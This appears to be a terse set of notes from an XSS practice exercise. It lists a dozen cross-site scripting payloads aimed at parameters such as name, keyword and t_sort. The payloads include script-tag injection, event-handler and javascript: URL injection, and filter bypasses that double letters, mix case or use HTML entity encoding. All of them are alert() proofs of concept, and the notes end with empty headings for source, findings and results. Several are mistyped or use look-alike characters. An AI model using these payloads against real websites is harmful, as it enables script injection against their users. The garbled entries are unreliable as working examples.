Palyload:name=<script>alert(/test/)</script>
Playload:keyword="><script>alert(/xss/)</script><"
Palyload:keyword=' οnmοuseοver=’alert(/xss/)’
Palyload:keyword=" οnmοuseοver='alert(/xss/)'
Playload:“><a href=”javascript:alert:alert(/xss/)”>click</a>
Playload:keyword=" ONmouseover='alert(/xss/)'
Playload:keyword=" oonnmouseover='alert(/xss/)'
Playlaod:keyword="><a hhrefref="javascscriptript:alert(/xss/)">click</a>
Playload:keyword=javascript:alert(/xss/)
Playload:keyword=javascript:alert(/xss/) html实体编码绕过
Playload:keyword=javascript:alert('http://www.baidu.com')
Playload:t_sort=" type="botton" οnmοuseοver='alert(/xss/)'
t_sort=click" type="button" οnclick="alert(/xss/)"
查看源码:
测试发现:
结果:
Playload:
稍等,测试中。。。